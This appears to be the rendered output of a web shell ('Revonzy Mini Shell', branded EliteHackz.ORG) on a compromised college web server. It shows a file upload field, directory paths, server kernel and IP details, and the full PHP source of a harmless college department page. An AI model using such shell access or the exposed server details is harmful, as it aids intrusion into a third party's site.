Revonzy Mini Shell

Revonzy Mini Shell

Şuanki Dizin: /home/wwwdreamtechnolo/public_html/lbpmsolapur.org/
Dosya Yükle :
Şuanki Dosya : /home/wwwdreamtechnolo/public_html/lbpmsolapur.org/geography.php

<?php
	require_once("admin/lib/functions.php");
	$db = new login_function();

	// $staff_details	=	$db->get_teaching_staff();
?>
<DOCTYPE html>
<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
	<title>Laxmibai Bhaurao Patil Mahila Mahavidyalaya</title>
	<link rel="stylesheet" type="text/css" href="css/stylesheet.css"/>  
    <link href="css/style.css" rel="stylesheet" type="text/css" media="all" />
    
    <link rel="stylesheet" type="text/css" href="css/stylesheet.css"/>	
	<style>
	
	.zoomin img 
{ 

 height: 300px; width: 800px;
 -webkit-transition: all 2s ease; -moz-transition: all 2s ease;
 -ms-transition: all 2s ease; 
 transition: all 2s ease;
 }
.zoomin img:hover {
 width:900px;
 height: 500px;
 }
 </style>
</head>
<body>	
	
	<?php
		require_once("lib/header.php");
	?>
		
	<div name="tab_container" style="background-color:#fff5e6"><div class="main_container">	
		<div class="page_highlighter" style="background-color:orange" >Geography</div>
			
        <?php
			require_once("highlights.php");
		?>
			
			<div class="data_container">
					
		
			<div class="title-img2"><div class="title-desc" style="color:white">About Department
			</div>
			<div class="clear">
			</div>
			</div>
			
			
		<div class="PDF">
		<object data="dept_pdf/Geography Department Profile.pdf" type="application/pdf" width="100%" height="800">
			   alt : <a href="dept_pdf/Geography Department Profile.pdf">Geography Department Profile</a>
		   </object>
		</div>	
			
			
			<br />
				<div class="col_1_of_12 span_1_of_12">
			<div class="title-img2"><div class="title-desc" style="color:white">Faculty Profile
			</div>
			<div class="clear">
			</div>
			</div>
			</div>
			<div class="main_container" style="margin:auto; width:750px;">
			<!--<a href="./non-teaching-staff.php" class="sp_link_title">Non-teaching Staff Profile >></a>-->
			
						<!--<h2><span style="color:red;font-size:20px;">Teaching Staff</span></h2>-->

			<br />
			<br />

				<table  cellpadding="0" cellspacing="0" style="width:770px;border:1px solid black;">
					<tr rowspan="2" style="height:10px;">
						<th align="center" valign="middle" style="background-color:#E91546;color:white;font-size:15px;border:1px solid black;vertical-align:middle;padding:0px;">Sr. <br />No</th>
						<th align="center"  valign="middle" style="background-color:#E91546;color:white;font-size:15px;border:1px solid black;vertical-align:middle;padding:20px;padding:0px;">Photo</th>
						<th  valign="middle" style="background-color:#E91546;color:white;font-size:15px;border:1px solid black;vertical-align:middle;padding:0px;">Name</th>
						<th align="center" valign="middle" style="background-color:#E91546;color:white;font-size:15px;border:1px solid black;text-align:center;vertical-align:middle;padding:0px;">Designation</th> 
						<th align="center" valign="middle" style="background-color:#E91546;color:white;font-size:15px;border:1px solid black;text-align:center;vertical-align:middle;padding:0px;">Department</th>
						<th align="center" valign="middle" style="background-color:#E91546;color:white;font-size:15px;border:1px solid black;text-align:center;margin:auto;vertical-align:middle;padding:0px;">Qualification</th>
						<th align="center" valign="middle" style="background-color:#E91546;color:white;font-size:15px;border:1px solid black;text-align:center;margin:auto;vertical-align:middle;padding:0px;">Experience</th>
						<th align="center" valign="middle" style="background-color:#E91546;color:white;font-size:15px;border:1px solid black;text-align:center;margin:auto;vertical-align:middle;padding:0px;">PDF</th>
					</tr>
										<?php
												$report_details = $db->get_all_Geography_staff();
												if(!empty($report_details))
												{
													$counter =0;
													foreach($report_details as $record)
													{
														$id				=	$report_details[$counter][0];
														$image			=	$report_details[$counter][1];
														$name			=	$report_details[$counter][2];
														$designation	=	$report_details[$counter][3];
														$department		=	$report_details[$counter][4];
														$qualification	=	$report_details[$counter][5];
														$pdf			=	$report_details[$counter][6];
														$experience		=	$report_details[$counter][7];
											?>
												<tr>
													<td align="center" valign="middle" style="font-size:15px;border:1px solid black;vertical-align:middle;padding:0px;" ><?php echo $counter+1; ?></td>
													<td align="center" valign="middle" style="font-size:15px;border:1px solid black;vertical-align:middle;padding:0px;"><a href="/slider_images/<?php echo $image ?>" target="_blank"><img src="/slider_images/<?php echo $image; ?>" height="70px" width="70px"></a></td>
													<td align="center" valign="middle" style="font-size:15px;border:1px solid black;vertical-align:middle;padding:0px;text-align:left;"><?php echo $name; ?></td>
													<td align="center" valign="middle" style="font-size:15px;border:1px solid black;vertical-align:middle;padding:0px;"><?php echo $designation; ?></td>
													<td align="center" valign="middle" style="font-size:15px;border:1px solid black;vertical-align:middle;padding:0px;"><?php echo $department; ?></td>
													<td align="center" valign="middle" style="font-size:15px;border:1px solid black;vertical-align:middle;padding:0px;"><?php echo $qualification; ?></td>
													<td align="center" valign="middle" style="font-size:15px;border:1px solid black;vertical-align:middle;padding:0px;"><?php echo $experience; ?></td>
													<td align="center" valign="middle" style="font-size:15px;border:1px solid black;vertical-align:middle;;padding:0px;"><a href="/gallery/<?php echo $pdf; ?>" target="_blank">View <br />Profile</a></td>
													
												</tr>
											   <?php
												$counter ++;
													}
												}else
												{
												?>
												<td colspan="10">No Data Found...</td>
												<?php
												}
											   
											   
											   ?>
								
										</table>
											<br /><br />
										<div class="col_1_of_12 span_1_of_12">
			<div class="title-img2"><div class="title-desc" style="color:white">Downloads
			</div>
			<div class="clear">
			</div>
			</div>
			</div>
	<table cellspacing='0' style="margin:0px;width:100%" > <!-- cellspacing='0' is important, must stay -->

	<!-- Table Header -->
	<thead>
		<tr style="background:#E91546">
			<th width="40" class="tab_data">Sr.No</th>
			<th class="tab_data">Title</th>
			<th width="30" class="tab_data">View</th>		
		</tr>
	</thead>
	<!-- Table Header -->

	<!-- Table Body -->
	<tbody>
			<?php
				$dept = "Physical Education";
									
										$report_details = $db->get_all_downloads_images_departmentwise($dept);
										if(!empty($report_details))
										{
											$counter =0;
											foreach($report_details as $record)
											{
												$id				=	$report_details[$counter][0];
												$deparment		=	$report_details[$counter][1];
												
												$title			=	$report_details[$counter][2];
												$image			=	$report_details[$counter][3];
									?>
                                        <tr>
                                            <td><?php echo $counter+1; ?></td>
											<td><?php echo $title; ?></td>
											<td><a href="/downloads/<?php echo $image; ?>" target="_blank">View</a></td>
										</tr>							
						<?php
						$counter++;
						}
						
					}
					else
					{
				?>				
					<tr>
						<td colspan="4">No data to list</td>
					</tr>
				<?php
					}				
				?>		
	</tbody>
	<!-- Table Body -->
</table>

			

			
			</div>
				
		</div>
	</div>
			
	<?php
		require_once("lib/footer.php");
	?>
</body>
</html>

EliteHackz.ORG
Revonzy Mini Shell
root@revonzy.com

Linux 65-254-81-4.cprapid.com 5.14.0-284.11.1.el9_2.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 9 05:49:00 EDT 2023 x86_64
Apache
65.254.81.4